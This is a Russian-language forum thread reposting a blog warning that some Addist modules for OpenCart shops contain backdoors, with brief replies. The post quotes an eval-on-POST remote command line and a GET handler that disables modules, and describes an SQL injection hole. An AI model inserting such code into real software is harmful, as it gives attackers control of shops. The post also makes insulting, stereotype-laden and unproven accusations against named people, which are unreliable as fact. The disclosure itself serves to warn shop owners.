Уязвимость Опенкарт

Тема в разделе "Вопросы безопасности", создана пользователем апа, 21 фев 2017.

  1. TopicStarter Overlay
    Offline

    апа Пользователь

    Сообщения:
    19
    Симпатии:
    15
    Репутация:
    0
    Просто скопировал с другого ресурса.
    У Лукоморья дуб зеленый…
    Другого названия происходящему, у меня придумать не получилось.

    Я вас никогда не просил сделать репосты, и распространить информацию.
    Это первый и надеюсь последний раз по такому поводу, но я вас убедительно прошу, мои дорогие читатели, друзья, враги, хейтеры.
    Распространите эту статью максимально по своим знакомым у которых есть магазины на Opencart.
    Только в моем контакт листе в скайпе из 200 человек, 10 нашли у себя эту заразу.

    Попробую достаточно подробно описать вам всю ситуацию с уязвимостью в дополнениях от Addist и выразить свои догадки, почему так произошло и что делать, чтобы подобная ситуация не повторилась.


    Небольшая предыстория. Три дня назад мне в личку прислали файлы модуля от Addist, в которых оказалась целая гора сюрпризов.

    1 Самый явный — это:
    Код:
    @eval($this->request->post['command']);
    2 Кроме этого:

    Код:
    if (!empty($this->request->get['deactivate']))
    {
    $this->cache->delete($this->request->get['deactivate']);
    $this->config->remove($this->request->get['deactivate']);
    }
    3 И еще

    [​IMG]

    Для тех кто ничего не понимает в программировании, объясню на пальцах:
    1. Код позволяет на вашем сервере выполнить любую команду при помощи функции eval(). Грубо говоря, если у вас стоит дополнение Addist, то получить ftp вашего магазина — это 5 секунд времени. Сделал это аддист специально, или случайно — не важно. Факт в том что такие модули обнаружились у почти 1000 владельцев работающих магазинов. Как я предполагал.

    2. Во втором примере, господин Мумтоз, как называет себя Аддист, вставил инструмент, который позволяет включать-отключать его модуль также извне удаленной командой на сверер. Но то что при помощи этой конструкции можно заебать владельца магазина до смерти и отключать нон-стоп любые модули, про это аддист или не подумал. Или сделал так специально.

    3. Ранее я писал про другие уязвимости в других дополнениях, Аддист болеет и этим — никакого экранирования данных передаваемых в базу, и если соответствующим образом составить данные, при помощи этой дыры можно сделать запрос в базу магазина к примеру добавить пользователя с правами суперадмина, ну а там уже перехватить полный доступ к магазину — тоже не проблема.

    ——————————————————————————————————————————————

    После того, как я получил эту информацию, мы сделали скрипт проверки уязвимости, сделали заплатку для нее ну и я связался с Диноксом и с 19ым, для того чтобы уведомить всех покупателей и участников комьюнити о наличии данной уязвимости.

    C нашего форума и с Liveopencart рассылка пошла сразу же. А вот с Opencartforumом возникла проблема, так как он оказался в стадии переноса, и сделать рассылку не получается до сих пор. Я все же надеюсь, что в течении следующей недели, они решат эту проблему и у нас получится охватить.

    —————————————————————————————————————————————

    Как я отношусь к этой ситуации.

    Есть несколько аспектов, которые меня немного напрягают.

    Как многие знают, все дополнения Addist были по непонятным причинам сняты с продажи на Opencartforum и на Liveopencart.
    Но не всех война убила и есть еще опенкарт рашша. Основных персонажей, которые стоят за этим проектом я не знаю. Но и знать не хочу. Лично у меня есть для этого достаточно оснований.

    1) Все вонючки с opencartforum, которым по каким то причинам стало там некомфортно, на ресурсах раши, чувствуют себя богами. Не будем тыкать пальцем, все всех знают.

    2) Смешно Opencart Russia и в топе Равиль и Мумтоз, осталось позвать Равшан и Джамшут и будет Опенкарт Наша Раша, насяльника.

    3) Среди топовых участников этого сообщества, есть несколько людей, устанавливающих клиентам варез, лично ловил за руку.

    4) Эти талантливые во всех смыслах персонажи. Не сделали ничего кроме перевода. Все их сообщество держиться сугубо на переводе Opencart на русский язык.
    Им некошерно использовать seo_pro для модификации ссылок, они даже не знают что это и зачем. Им некошерно делать уникальные Мета заголовки h1 и title.
    Вместо того чтобы перенять опыт и взять лучшее от сообщества OcStore, или у нас. Они пошли своим тупорылым путем.

    И вот эта тупорылость, недальновидность, глупость хозеяв сообщества ОпенкартНашаРаша — и это я мягко выражаюь, привела к тому что, в их «типа сборке» отсуствует нормальное seo. Соответственно, вместо того чтобы взять seo-pro от rb2 и любой генератор мета-тегов, они пригрели у себя Аддиста, которого погнали ссаными тряпками отовсюду. И им было хорошо. Модули Addist закрывали проблемы с seo, хозяева Нашей Раши зарабатывали комиссию на продаже дополнений, функционал, которых рядом лежит бесплатно, и по качеству реализации на порядок круче.

    После обнаружения уязвимости. Мумтоз начал бегать как ужаленный в жопу. И плакать на всех ресурсах, что его взломали, что он не виновен. Это не его код. И с него требуют 50 000 рублей, за то, чтобы «потихому» замять эту ситуацию. А также он сообщил, что устранил на каком то количестве магазинов свою дыру, через ту же дыру.

    Лично я не верю ни одному слову. Так как:

    1. Мумтоз не предоставил доказательств фактов взлома.
    2. По его словам он закрыл уязвимость первого типа, но я вам привел еще две, и третьего типа проблема осталась, ваши магазины все еще под угрозой.
    3. Я провел небольшое личное расследование. Модули с уязвимостью у некоторых моих подопечных были куплены более года назад, для разных версий движка и на разных площадках. Чтобы не быть голословным, помните статью про битву упырей. Она написана 6 мая 2016 года. Олег купил у него модуль, в апреле. Мы подняли архив с этим модулем. Уже тогда в нем есть все вышеописанные дыры. Я не верю, что 7 месяцев, Аддист не мог не замечать, что с его сервера распространяется дырявый код.
    4. Будучи не самым плохим программистом, Мумтоз, сознательно использовал небезопасные приемы и реализации, зная, что ставит под удар чужие проекты.

    Знаете. Я бы с удовольствием подискутировал и с Мумтозом, и с Джамшутом и с Равшаном. И со всеми всеми, про то какой я плохой. Сколько мне заплатили за эти статьи, чтобы замочить Аддиста и Нашу Рашу, почему я раньше костерил по чем свет Динокса и его форум, а теперь перестал, почему я пиарю Liveopencart, а не пиарю Динокса и еще про массу тайн интриг и расследований. Но я не хочу. Вы там уж сами за моей спиной, думаю справитесь. Все что вам в голову взбредет, говорю сразу — это правда. Так и думайте, так и есть. Йода — средоточие зла, интриган, хам деспот и самодур.

    Для всех остальных, если вам интересно мое мнение. Могу сказать просто.
    Команда неудачников Нашей Раши, породила такое чудовищное явление как модули Аддиста в свободной продаже. В их оправдания я не верю. Если предположить всё-таки, что наша Маша громко плачет, и на самом деле брешет как сидорова коза, то ответственность за ситуацию абсолютно равнозначная. Как на самом Аддисте, так и на владельцах площадки Опенкарт Наша Раша.

    Ну и опять же, если вам интересно мнение, что с этим делать скажу просто. Десятой дорогой обходить эту звероферму. Просто забыть адрес площадки Нашей Раши. А также я всем рекомендую УДАЛИТЬ ВСЕ ВСЕ ВСЕ ФАЙЛЫ МОДУЛЕЙ Addist и попросить у него манибек. Я даже не привожу здесь инструкции для htaccess, которыми мы блокировали всем эту дыру. Просто удаляйте модули без разбирательств. Так как просто беглым просмотром нашлось вместо одной дыры целых три.

    И ребят, обычно я всегда каким то образом даю однозначные рекомендации, советы. В данной ситуации все вышенаписанное — это мое личное мнение! Я не настаиваю, чтобы вы к нему прислушивались, я ни в коем случае не призываю вас переходить на мою сторону, становиться моим фанатом, последователем, разделять мои мысли и идеи.
    Я просто собрал в кучу ответы на вопросы, которые сыпятся на меня в личке и в комментариях к предыдущей статье.

    p.s. Мумтозы, Равили и так далее… Идите лесом. Я изначально хотел дать вам возможность разместить пост в свое оправдание. Но ваше поведение — ниже плинтуса. Поэтому, вам не место у меня в блоге, ищите площадку плакаться за жизнь в другом месте. Здесь ваших комментариев в свое оправдание не будет. Это не Валдайский Дискуссионный клуб!
     
  2. Online

    FintMax Команда форума Модератор

    Сообщения:
    1.700
    Симпатии:
    6.781
    Репутация:
    10.168
    Уже была подобная тема как раз = эта же информация, автор вроде как свои моды обновил, осадок только у всех его клиентов остался......
     
  3. TopicStarter Overlay
    Offline

    апа Пользователь

    Сообщения:
    19
    Симпатии:
    15
    Репутация:
    0
    ой, тогда эту нужно удалить.
     
  4. Offline

    pinkugkc Пользователь

    Сообщения:
    24
    Симпатии:
    5
    Репутация:
    0
    nice adjustment
     
  5. Offline

    Pavlik Пользователь

    Сообщения:
    412
    Симпатии:
    148
    Репутация:
    15
    Addist - красавец ))
    Помню хотел у него давным-давно купить мультивалюту.
    Как посмотрел я на его загрузчик...
    "Оооой неее" думаю.

    Слышь братишь, а как удалить твои модули?
    А без бекапа - никак!
    Добби свободен.
     
  6. TopicStarter Overlay
    Offline

    апа Пользователь

    Сообщения:
    19
    Симпатии:
    15
    Репутация:
    0
    это фраза хит!!! :rulez::rulez::rulez::rofl:
     
  7. Offline

    Nestar Пользователь

    Сообщения:
    33
    Симпатии:
    788
    Репутация:
    0
    Что за автор Addist ? Мож кто подскажет его модули? Чтобы не наступить на грабли...а то модуль мультивалюта к примеру стоит на сайте..
     
  8. TopicStarter Overlay
    Offline

    апа Пользователь

    Сообщения:
    19
    Симпатии:
    15
    Репутация:
    0
    он прекрасно гуглится
     
    FintMax нравится это.
  9. Offline

    Nestar Пользователь

    Сообщения:
    33
    Симпатии:
    788
    Репутация:
    0
    верно, нашел в гугле с первого раза...
     
  10. TopicStarter Overlay
    Offline

    апа Пользователь

    Сообщения:
    19
    Симпатии:
    15
    Репутация:
    0
    Да и вообще я с чужими шифровками на сайте стараюсь не иметь дел. Некоторые автора так переживают что их код украдут что доходит до маразма. Пускай ищут дураков в другом месте. И что там скрывать? от кого? от школьников которые не умеют гуглить, если захотят дешифровать то дешифруют. Если покупать скрипт то думаю автору стоит указать что к чему. Лучше тогда уж нанять программиста пускай сделает все.